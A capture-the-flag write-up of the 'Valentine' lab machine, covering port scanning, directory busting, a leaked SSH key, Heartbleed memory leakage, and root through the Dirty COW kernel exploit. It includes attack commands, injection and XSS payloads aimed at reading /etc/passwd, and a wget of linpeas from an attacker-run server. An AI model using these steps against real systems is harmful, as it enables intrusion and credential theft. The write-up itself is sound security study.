Enumeration
rustscan and nmap goes first.
nmap
Command: nmap -A -p- -T4 -Pn -vv -oN nmap-report-tcp.txt 10.10.10.79
Result:
Nmap scan report for 10.10.10.79
Host is up, received user-set (0.31s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| ...
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-methods:
|_ Supported Methods: HEAD POST
443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_ssl-date: 2023-09-21T14:53:26+00:00; 0s from scanner time.
| http-methods:
|_ Supported Methods: POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-02-06T00:45:25
| Not valid after: 2019-02-06T00:45:25
| MD5: a413:c4f0:b145:2154:fb54:b2de:c7a9:809d
| SHA-1: 2303:80da:60e7:bde7:2ba6:76dd:5214:3c3c:6f53:01b1
| -----BEGIN CERTIFICATE-----
|...
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 0s
rustscan:
Command: rustscan -a 10.10.10.79 -r 1-65535 --ulimit 5000 -- -A
Result:
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.79:22
Open 10.10.10.79:80
Open 10.10.10.79:443
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A" on ip 10.10.10.79
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org )
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAIMeSqrDdAOhxf7P1IDtdRqun0pO9pmUi+474hX6LHkDgC9dzcvEGyMB/cuuCCjfXn6QDd1n16dSE2zeKKjYT9RVCXJqfYvz/ROm82p0JasEdg1z6QHTeAv70XX6cVQAjAMQoUUdF7WWKWjQuAknb4uowunpQ0yGvy72rbFkSTmlAAAAFQDwWVA5vTpfj5pUCUNFyvnhy3TdcQAAAIBFqVHk74mIT3PWKSpWcZvllKCGg5rGCCE5B3jRWEbRo8CPRkwyPdi/hSaoiQYhvCIkA2CWFuAeedsZE6zMFVFVSsHxeMe55aCQclfMH4iuUZWrg0y5QREuRbGFM6DATJJFkg+PXG/OsLsba/BP8UfcuPM+WGWKxjuaoJt6jeD8iQAAAIBg9rgf8NoRfGqzi+3ndUCo9/m+T18pn+ORbCKdFGq8Ecs4QLeaXPMRIpCol11n6va090EISDPetHcaMaMcYOsFqO841K0O90BV8DhyU4JYBjcpslT+A2X+ahj2QJVGqZJSlusNAQ9vplWxofFONa+IUSGl1UsGjY0QGsA5l5ohfQ==
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRkMHjbGnQ7uoYx7HPJoW9Up+q0NriI5g5xAs1+0gYBVtBqPxi86gPtXbMHGSrpTiX854nsOPWA8UgfBOSZ2TgWeFvmcnRfUKJG9GR8sdIUvhKxq6ZOtUePereKr0bvFwMSl8Qtmo+KcRWvuxKS64RgUem2TVIWqStLJoPxt8iDPPM7929EoovpooSjwPfqvEhRMtq+KKlqU6PrJD6HshGdjLjABYY1ljfKakgBfWic+Y0KWKa9qdeBF09S7WlaUBWJ5SutKlNSwcRBBVbL4ZFcHijdlXCvfVwSVMkiqY7x4V4McsNpIzHyysZUADy8A6tbfSgopaeR2UN4QRgM1dX
| 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+pCNI5Xv8P96CmyDi/EIvyL0LVZY2xAUJcA0G9rFdLJnIhjvmYuxoCQDsYl+LEiKQee5RRw9d+lgH3Fm5O9XI=
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_ssl-date: 2023-09-21T14:26:53+00:00; 0s from scanner time.
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-02-06T00:45:25
| Not valid after: 2019-02-06T00:45:25
| MD5: a413:c4f0:b145:2154:fb54:b2de:c7a9:809d
| SHA-1: 2303:80da:60e7:bde7:2ba6:76dd:5214:3c3c:6f53:01b1
| -----BEGIN CERTIFICATE-----
| ...
|_-----END CERTIFICATE-----
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 0s
rustscan and nmap found that port 80, 443, and 22 open with name valentine.htb.
I go to /etc/hosts to add valentine.htb. Do a searching to see what is it about. HTTP and HTTPS have the same result.
It uses Apache HTTP Server 2.2.22, PHP 5.3.10, and Ubuntu OS.
Because there is nothing left to be discovered, I use dirbuster and gobuster to do some directory busting and DNS busting. Might using feroxbuster for recursive gobuster, but I’ll stick to these first.
Command: dirbuster
Target URL: http://valentine.htb:80
Number of Threads: 200
Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
File extension: php,txt
Use blank extension: true
Command: gobuster dns -d "valentine.htb" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
Result:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: valentine.htb
[+] Threads: 100
[+] Timeout: 1s
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================
Gobuster found nothing, but dirbuster found interesting directory.
Before enumerating one by one through the list of directories, I use nikto, in case there are interesting finding that I missed.
Command: nikto -url http://valentine.htb
Result:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.79
+ Target Hostname: valentine.htb
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /dev/: Directory indexing found.
+ /dev/: This might be interesting.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 121971, size: 5108, mtime: Tue Aug 28 17:48:10 2007. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8769 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-09-21 22:59:09 (GMT7) (2717 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
/index.php has similar content with before.
/cgi-bin is forbidden. Atleast it tells me that it uses Apache 2.2.22.
Dirbuster finds /cgi-bin, reflecting from shocker HTB box that has vulnerability inside the directory by searching if there is any executable file by Common Gateway Interface (CGI), I decided to use gobuster to search for any file.
Command: gobuster dir -u https://valentine.htb/cgi-bin -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -x sh,cgi,c,pl,py,rb -k -f
Result:
None
/doc is forbidden too. Maybe I could use gobuster to see if there are any file laying around. Or maybe later, after searching directory on cgi-bin finished.
/icons/ have the same result.
/dev/ is interesting, there are two files, notes.txt and hype_key.
It seems that notes.txt explains, encoder/decoder is broken.
I think this related to /decode.php and /encode.php
If I might guess, this decodes hex to string and vice versa. After trying to decode it with /decode.php, it failed.
Trying with cyberchef, paste it into input, and use “from hex” recipe, I get the RSA Private Keys. My guess is this SSH key.
So I stored it to file named hash_key in my machine. Now that I have to do is to find what is the username.
Foothold
Enumerating again, I find out that the encoder is encodes string to base64.
The input field might be interesting for me to enumerate further, to see if there are any vulnerabilities inside it. But, it seems all of the input goes to base64 encoded or decoded string, might be a bit hard I guess. Here is the list of things that I try:
- Code Injection
Payload: <?php phpinfo(); ?>
Result: None
Reason: There might be mistake on input sanitation. - SQL Injection
Payload: ‘;# —
Result: None
Reason: There might be mistake on input sanitation and the server using DB. It’s a little unreasonable based on the enumeration, but won’t hurt to try. - Server Side Template Injection
Payload: {{7*’7'}}
Result: None
Reason: There might be mistake on input sanitation and the server using template. I know it’s not some kind of PHP Twig, Python Jinja, etc. It’s a little unreasonable, but won’t hurt to try. - XSS Injection
Payload: <script>alert(1)</script>
Result: It works
Reason: There might be mistake on input sanitation on the client side. Let’s see if I can use it to extract /etc/passwd file.
This do gives me idea, what if I can inject through base64 and have it print the file. I’ll try later.
Payload:
- <img src=”” onerror=”document.write(‘<iframe src=file:///etc/passwd></iframe>’)”/>
- <img src="" onerror="document.write('<iframe src=file://../../../../../../../../etc/passwd></iframe>')"/>
- PGltZyBzcmM9IiIgb25lcnJvcj0iZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgc3JjPWZpbGU6Ly8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkPjwvaWZyYW1lPicpIi8+
- <img src="" onerror="document.write('<iframe src=file:%2f%2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2fetc%2fpasswd></iframe>')"/>
Result:
There might be multiple payload to try to exploit it, but for now I’ll move on. Now that the /omg picture is interesting because of steganography possibility. I saved the file using wget and try to see if there are any hidden data inside it.
I found nothing using binwalk.
Command: binwalk -e --signature omg
One thing left to try before going back to injection in input field, try hash_key spray to several suspected name in ssh. Changed permission with chmod 600 hash_key to try. To be expected, passphrase required. Tried “omg”, “OMG”, “ohmygod”, and “OhMyGod”, but no result.
So, I try to reverse search the picture to see if there are any hint. I found the illustrator from one of the article that used the same picture. His name is Ernesto Víctor Saúl Herrera Hernández. Might try to use that as password or username. It seems that I went into rabbit hole.
Just now, I remember that I can try to crack the hash_key with john. Here is the link and this link that I use as a guide this time.
Command: john --wordlist=/usr/share/wordlists/rockyou.txt hash_key
Result:
0 password hashes cracked
Seems it is uncrackable for now. I’ve tried to delete the proc-type and dek-info, use ssh2john and use john to crack it.
Now with nothing in mind, I’m back to Injection. Payload:
<script>document.write('<iframe src=file:///../../../../../../../../etc/passwd></iframe>');</script>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
<?php echo("hello")
PD9waHAgZWNobygiaGkiKSA/Pg==
PGgxPjwvaDE+
Now that I have a new idea, what if there is a vulnerability inside PHP 5.3.10 base64 encoder/decoder. I found nothing after search on internet. Back again at injection, I found out that it can be injected with HTML code.
After enumerating for a while, I found that “<?” and “</>” is being deleted. After two hours of headscratching, I decided to take a break and look at what I’ve found.
I try to reverse search the image again and find this article. One thing that I didn’t check is SSL/TLS vulnerability, and that’s what the picture about. It is about heartbleed vulnerability in SSL/TLS. So, I run nmap to check if it’s vulnerable, and it is vulnerable.
Command: nmap -sV -p 443 --script=ssl-heartbleed.nse 10.10.10.79
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
Now that I found out what it is, I find this script of CVE from github.
Command: python2 exploit.py valentine.htb
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: valentine.htb:443, 1 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################
.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==Nk....UP........t.h
There is a text that looking similar to a base64 encoded string. Take it to cyberchef and found the password is heartbleedbelievethehype.
I get that it’s a password, but I don’t know what the username yet. I try to use some of the enumerated one such as omg, valentine, dev, and last is hype, as the name suggests, hype’s key.
Privilege Escalation
I ran some of basic enumeration for privilege escalation. Maybe there are some easy
Command: find / -perm -u=s -type f 2>/dev/null
Result (that might be interesting):
/bin/su
...
/usr/lib/pt_chown
...
/usr/bin/pkexec
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/newgrp
/usr/bin/lppasswd
/usr/bin/mtr
/usr/bin/chsh
/usr/bin/arping
...
/usr/sbin/uuidd
/usr/sbin/pppd
Command: sudo -l
Result: need password
Command: uname -a
Result: Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Command: id
Result: uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare)
I’ll try to run linpeas first to know if there are any kernel exploit that I can use. Here is how I transfer it.
Attacker: python -m http.server 1234
Victim: wget http://10.10.14.2:1234/linpeas.sh
This is the list of kernel exploit that I get:
[+] [CVE-2016-5195] dirtycow
[+] [CVE-2016-5195] dirtycow 2
[+] [CVE-2013-2094] perf_swevent
[+] [CVE-2013-2094] perf_swevent 2
[+] [CVE-2021-4034] PwnKit
[+] [CVE-2015-3202] fuse (fusermount)
[+] [CVE-2014-4699] ptrace/sysret
[+] [CVE-2014-4014] inode_capable
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
[+] [CVE-2019-18634] sudo pwfeedback
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2018-1000001] RationalLove
[+] [CVE-2017-7308] af_packet
[+] [CVE-2017-6074] dccp
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
[+] [CVE-2017-1000253] PIE_stack_corruption
[+] [CVE-2016-2384] usb-midi
[+] [CVE-2015-9322] BadIRET
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
[+] [CVE-2014-5207] fuse_suid
[+] [CVE-2014-0196] rawmodePTY
[+] [CVE-2013-2094] semtex
[+] [CVE-2013-1959] userns_root_sploit
[+] [CVE-2013-0268] msr
[+] [CVE-2012-0809] death_star (sudo)
It suggests dirtycow at the first output. I’ll try this exploit that I found from github.
Command: gcc dirty.c -o dirty --static -lcrypt
— static flag is used for ELF compiled with library. Transfer it to the victim and executed it. This might take a while.
And I got the root shell.
Summary
There are several vulnerabilities here such as:
- Sensitive data exposure such as notes.txt, hype_key in /dev directory, error page that shows server’s version, etc.
- XSS Injection (/encode.php and /decode.php).
- HTML Injection.
- Outdated SSL/TLS leads to Heartbleed (CVE-2014–0160).
- Local privilege escalation “Dirty Cow” vulnerability (CVE-2016–5195).
Remediation that I might suggest is:
- Migrate the sensitive data to another place and hide or remove /dev directory.
- Reinforce the input sanitation.
- Upgrade SSL/TLS version.
- Update and upgrade the OS.
- Change SSH port and don’t allow it to login as root or don’t allow it to be used at all.
What didn’t work for me is:
- Cross-Site Scripting (XSS) Injection
- SQL Injection
- Server Site Template Injection (SSTI)
- Code Injection
What can I improve is:
- More quiet in scanning might be good.
- Exploiting with dirtycow might broke the machine because it moves or creates backup of /etc/passwd and replace it.
- Try to be creative in making a payload.
What I learnt from this box is:
- Always check every details of enumeration, such as SSL/TLS version, “hype” in “hype_key”, etc.
- nmap scripts does help with checking vulnerability.
- When doing privilege escalation, try to enumerate the version of the linux first and try if the exploit works. Maybe using linenum or linux-exploit-suggester, like linpeas has.
- Using “ — static” flag in gcc can help to make an ELF file. If there is still any dependencies, might as well use docker with the supported environment.
- There are multiple ways to root a machine. Why? It’s just a feeling, because I didn’t enumerate further in the machine such as cronjobs, root ELF that accessible to user, etc.
There are possibilities that this machine have several vulnerabilities. Please let me know if there are any recommendation, critics, or something that I might miss in this box. That’s all folks. Thanks for reading.